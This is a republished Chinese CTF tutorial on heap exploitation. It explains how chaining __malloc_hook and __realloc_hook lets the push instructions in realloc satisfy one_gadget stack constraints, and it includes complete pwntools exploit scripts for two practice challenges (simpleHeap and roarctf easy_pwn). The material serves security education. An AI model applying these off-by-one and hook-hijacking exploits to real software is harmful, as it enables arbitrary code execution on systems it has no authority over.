当前位置:网站首页 > 网络安全培训 > 正文

通过realloc_hook调整栈帧使onegadget生效

freebuffreebuf 2020-10-27 400 0

本文来源:蚁景科技
本文首发于合天“合天智汇”公众号 作者:SkYe在某些堆的题目当中,由于限制只能使用 house of spirit 等方法劫持 malloc_hook ,这种情况一般是往 malloc_hook 写入 onegadget ,再次申请堆来 getshell 。由于栈帧情况不满足,查询到的所有 onegadget 可能都打不通,这时就可以考虑下用 malloc_hook 和 realloc_hook 结合。先通过 realloc 调整栈帧,然后在运行 onegadget 。了解 reallocrealloc 在库函数中的作用是重新调整 malloc 或 calloc 所分配的堆大小。它和 malloc 函数一样有 hook 函数,当 hook 函数不为空时,就会跳转运行 hook 函数(和 malloc_hook 一样的)。
__int64 __fastcall realloc(signed__int64 a1,unsigned__int64 a2,__int64 a3){……     if(_realloc_hook )return_realloc_hook(a1,a2,retaddr);……看看 realloc 的汇编代码:(可以把 libc 拖到 ida 中看,也可以泄露地址后 gdb 调试查看 x /20i [addr]
.text:00000000000846C0 realloc         proc near               ; DATA XREF: LOAD:0000000000006BA0↑o .text:00000000000846C0 ; __unwind { .text:00000000000846C0                 push    r15             ; Alternative name is '__libc_realloc' .text:00000000000846C2                 push    r14 .text:00000000000846                   push    r13 .text:00000000000846C6                 push    r12 .text:00000000000846C8                 mov     r13, rsi .text:00000000000846CB                 push    rbp .text:00000000000846CC                 push    rbx .text:00000000000846CD                 mov     rbx, rdi .text:00000000000846D0                 sub     rsp, 38h .text:00000000000846D4                 mov     rax, cs:__realloc_hook_ptr .text:00000000000846DB                 mov     rax, [rax] .text:00000000000846DE                 test    rax, rax .text:00000000000846E1                 jnz     loc_848E8        ; 跳转执行 realloc_hook .text:00000000000846E7                 test    rsi, rsi .text:00000000000846EA                 jnz     short loc_846F5 .text:00000000000846EC                 test    rdi, rdi .text:00000000000846EF                 jnz     loc_84960函数一开始有很多的 push ,realloc 函数先执行 push 压栈,然后在跳转执行 realloc_hook 存储的函数。我们就是利用这些 push 调整栈帧。push 的数量发生变化会影响 rsp 的地址,这样就可以控制 rsp 的取值,从而满足 onegadget 的执行条件。除了可以控制 push 数量,还能通过偏移得到其他的 push xxxmalloc_hook 与 realloc_hook 配合将 malloc_hook 劫持为 realloc ,realloc_hook 劫持为 onegadget ,实际运行顺序:
malloc -> malloc_hook -> realloc -> realloc_hook -> onegadget这样就能经过 realloc 调整栈帧后再运行 onegadget 。实际情况中,并不是直接劫持 malloc_hook 为 realloc ,而是要加上一定的偏移,也就是调整 push 的数量,让栈帧结构满足 onegadget 运行。realloc 这个偏移做题还是逐个试感觉快一点,因为设想是少一个 push ,rsp 就会向前移动一个内存单元,对应的 [rsp+0x30]=[rsp+0x38],但实际上有少部分位置可能被其他东西写入改变了原来的值。自行调试体会一下:
# 6个push pwndbg> x /20gx $rsp 0x7fffffffdcb8: 0x00007ffff7a9195f  0x00007fffffffdd20 0x7fffffffdcc8: 0x00005555555548e0  0x00007fffffffde40 0x7fffffffdcd8: 0x0000000000000000  0x0000000000000000 0x7fffffffdce8: 0x00007ffff7a43ea0  0x00007fffffffde40 0x7fffffffdcf8: 0x0000000000000000  0x00007fffffffdd40 0x7fffffffdd08: 0x00005555555548e0  0x00007fffffffde40 0x7fffffffdd18: 0x0000000000000000  0x0000000000000000 0x7fffffffdd28: 0x0000555555554b71  0x00005555555548e0 0x7fffffffdd38: 0x0000001000000006  0x00007fffffffdd60 0x7fffffffdd48: 0x0000555555554f86  0x00007fffffffde40  # 5个push pwndbg> x /20gx $rsp 0x7fffffffdcc0: 0x00007ffff7a9195f  0x00005555555548e0 0x7fffffffdcd0: 0x00007fffffffde40  0x0000000000000000 0x7fffffffdce0: 0x0000000000000000  0x00007ffff7a43ea0 0x7fffffffdcf0: 0x00007fffffffde40  0x0000555555554a23 0x7fffffffdd00: 0x0000000000000000  0x00007fffffffdd40 0x7fffffffdd10: 0x00005555555548e0  0x00007fffffffde40 0x7fffffffdd20: 0x0000000000000000  0x0000555555554b71 0x7fffffffdd30: 0x00005555555548e0  0x0000001000000006 0x7fffffffdd40: 0x00007fffffffdd60  0x0000555555554f86 0x7fffffffdd50: 0x00007fffffffde40  0x0000000100000000原理上是:少一个 push ,rsp 就会向前移动一个内存单元,对应的 [rsp+0x30]=[rsp+0x38],但实际部分位置的值会变,所以逐个试,速度可能比计算快。例题[Vpadding:3px 4px;background-color:#f6f6f6">if(i>=size),具体逻辑如下:
__int64 __fastcall sub_C39(__int64 ptr,intsize){__int64 result;// raxinti;// [rsp+1Ch] [rbp-4h]for(i =0;;++i ){result =(unsignedint)i;if(i >size )// off by onebreak;if(!read(0,(void*)(i +ptr),1uLL))// 输出错误的异常处理exit(0);if(*(_BYTE *)(i +ptr)=='\n'){result =i +ptr;*(_BYTE *)result =0;returnresult;}}returnresult;}思路使用 off by one 伪造 chunk size,造成 chunk extend ,再利用 unsorted bin 的特点,泄露出 unsorted bin fd 指针的 libc 地址。将上一步中的 chunk extend 剩下在 bin 中的内存申请出来,造成两个指针指向同一个地址,配合 edit 功能实现 houst of spirit ,劫持 __malloc_hook 。实际测试后全部 onegadget 因为栈环境问题都无法打通,需要结合 malloc_hook 、 realloc_hook 调整栈环境才能打通。
溢出修改 chunk size 造成 chunk extend ,chunk0 用于溢出 chunk1 ,chunk2 用于读取 unsorted bin fd 指针,chunk3 防止 fake chunk 与 topchunk 合并。溢出 size 是经过计算符合 house of spirit 要求:
create(0x18,'s')create(0x48,'k')create(0x68,'y')#2create(0x10,'e')payload ='a'*0x18+'\xc1'edit(0,payload)free(1)create(0x48,'yyds')show(2)泄露 libc 地址后,将 bin 中剩余内存申请出来,该指针与 chunk2 指向相同地址,任选其一释放,再用另外一个修改 fastbin fd 指针:
create(0x68,'skye')#4free(4)payload =p64(malloc_hook-27-8)+'\n'edit(2,payload)正常来说将 malloc_hook 劫持为 onegadget 即可,但是测试发现这条题目的栈环境不满足全部 onegadget 条件,这就需要调整阵结构,使 onegadget 生效。需要配合使用 realloc_hook 和 malloc_hook。将 malloc_hook 劫持为 realloc ,realloc_hook 劫持为 onegadget 。然后通过多次尝试确定偏移为 12 。EXP
frompwn import*context(log_level='debug',os='linux',arch='amd64')p =process("./vn_pwn_simpleHeap")# p = remote("node3.buuoj.cn",29864)elf =ELF("./vn_pwn_simpleHeap")libc =ELF("/lib/x86_64-linux-gnu/libc.so.6")# libc = ELF("./libc-2.23.so")defcreate(size,content):p.sendlineafter("choice: ",'1')p.sendlineafter('?',str(size))p.sendafter(':',content)defedit(id,content):p.sendlineafter("choice: ",'2')p.sendlineafter('?',str(id))p.sendafter(':',content)defshow(id):p.sendlineafter("choice: ",'3')p.sendlineafter('?',str(id))deffree(id):p.sendlineafter("choice: ",'4')p.sendlineafter('?',str(id))create(0x18,'s')create(0x48,'k')create(0x68,'y')#2create(0x10,'e')payload ='a'*0x18+'\xc1'edit(0,payload)free(1)create(0x48,'yyds')show(2)leak_addr =u64(p.recv(6).ljust(8,'\x00'))log.info("leak_addr:"+hex(leak_addr))libc_base =leak_addr -0x3c4b78malloc_hook =libc_base +libc.sym['__malloc_hook']log.info("malloc_hook:"+hex(malloc_hook))realloc_hook =libc_base +libc.sym['__realloc_hook']log.info("realloc_hook:"+hex(realloc_hook))realloc =libc_base +libc.sym['realloc']log.info("realloc:"+hex(realloc))create(0x68,'skye')#4free(4)payload =p64(malloc_hook-27-8)+'\n'edit(2,payload)create(0x68,'a')create(0x68,'b')#5one =[0x45226,0x4527a,0xf0364,0xf1207]# one = [0x45216,0x4526a,0xf02a4,0xf1147]onegadget =libc_base +one[1]log.info("one:"+hex(onegadget))payload ='a'*11+p64(onegadget)+p64(realloc+12)+'\n'edit(5,payload)gdb.attach(p)# create(0x10,'skye,yyds')p.sendlineafter("choice: ",'1')p.sendlineafter('?',str(0x10))p.interactive()roarctf_2019_easy_pwn基本功能一个堆管理器,有增删查改功能。所有功能都是基于列表的下标定位操作对象。用 3 个列表维护堆:chunk_inuse、chunk_size、chunk_ptr。漏洞在 edit 功能里面 sub_E26 函数,这个函数用来处理输入长度的,具体代码如下:
__int64 __fastcall check_size(signedintsize,unsignedintinput_length){__int64 result;// raxif(size >(signedint)input_length )returninput_length;if(input_length -size ==10)LODWORD(result)=size +1;//off by oneelseLODWORD(result)=size;return(unsignedint)result;}当我们要求写入的长度(input_length)大于堆 size 10 个字节时,就可以写入 size + 1 字节,造成 off by one 。思路这条题目和 [V&N2020 公开赛]simpleHeap思路一样。使用 off by one 伪造 chunk size,造成 chunk extend ,再利用 unsorted bin 的特点,泄露出 unsorted bin fd 指针的 libc 地址。将上一步中的 chunk extend 剩下在 bin 中的内存申请出来,造成两个指针指向同一个地址,配合 edit 功能实现 houst of spirit ,劫持 __malloc_hook 。实际测试后全部 onegadget 因为栈环境问题都无法打通,需要结合 malloc_hook 、 realloc_hook 调整栈环境才能打通。EXP
frompwn import*context(log_level='debug',os='linux',arch='amd64')# p = process("./roarctf_2019_easy_pwn")p =remote("node3.buuoj.cn",29259)elf =ELF("./roarctf_2019_easy_pwn")libc =ELF("./libc-2.23.so")# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")defcreate(size):p.recvuntil("choice: ")p.sendline("1")p.recvuntil(": ")p.sendline(str(size))defedit(index,size,content):p.recvuntil("choice: ")p.sendline("2")p.recvuntil(": ")p.sendline(str(index))p.recvuntil(": ")p.sendline(str(size))p.recvuntil(": ")p.send(content)deffree(index):p.recvuntil(": ")p.sendline("3")p.recvuntil(": ")p.sendline(str(index))defshow(index):p.recvuntil(": ")p.sendline("4")p.recvuntil(": ")p.sendline(str(index))create(0x18)#overwritecreate(0x68)create(0x68)#2create(0x10)#protectpayload ='a'*0x18+'\xe1'edit(0,len(payload)-1+10,payload)free(1)create(0x68)show(2)p.recvuntil("content: ")leak_addr =u64(p.recv(6).ljust(8,'\x00'))log.info("leak_addr:"+hex(leak_addr))libc_base =leak_addr -0x3c4b78malloc_hook =libc_base +libc.sym['__malloc_hook']log.info("malloc_hook:"+hex(malloc_hook))realloc =libc_base +libc.sym['realloc']log.info("realloc:"+hex(realloc))realloc_hook =libc_base +libc.sym['__realloc_hook']log.info("realloc_hook:"+hex(realloc_hook))create(0x68)free(4)payload =p64(malloc_hook-27-8)edit(2,len(payload),payload)create(0x68)create(0x68)# one = [0x45226,0x4527a,0xf0364,0xf1207]one =[0x45216,0x4526a,0xf02a4,0xf1147]onegadget =libc_base +one[1]log.info("onegadget:"+hex(onegadget))payload ='a'*11+p64(onegadget)+p64(realloc)edit(5,len(payload),payload)create(0x10)# gdb.attach(p)p.interactive()            
转载请注明来自网盾网络安全培训,本文标题:《通过realloc_hook调整栈帧使onegadget生效》


            
标签:合天网安


            

                                                            

        

    





 
     




 
    
猜你喜欢
 
    

         
    


 

                        

    


    

         
        

            
        

        
         
        

            
关于我



    
欢迎关注微信公众号

    

    


                

        
        
    


    

        




关于我们



网络安全培训,黑客培训,渗透培训,ctf,攻防

















标签列表








    









    

                
        
        

        	

	        	

	        		
	        		
	        	

	        	

	        		
	        		
	        	

	        	

	        		
	        		

	        			
战略合作伙伴

	        			
网盾科技

	        		

	        	

	        	

	        		
	        		
Powered by www.plaaso.com

	        	

        	

        	
咨询热线:18696195380,18672920250 (微信同号)   商务合作:13260607300
QQ:3329043  QQ群:594653844

        

        
    

    
    

	    

	    	鄂ICP备2023003462号-13
	    	
	    	©2020-2028 plaaso.com 网盾安全培训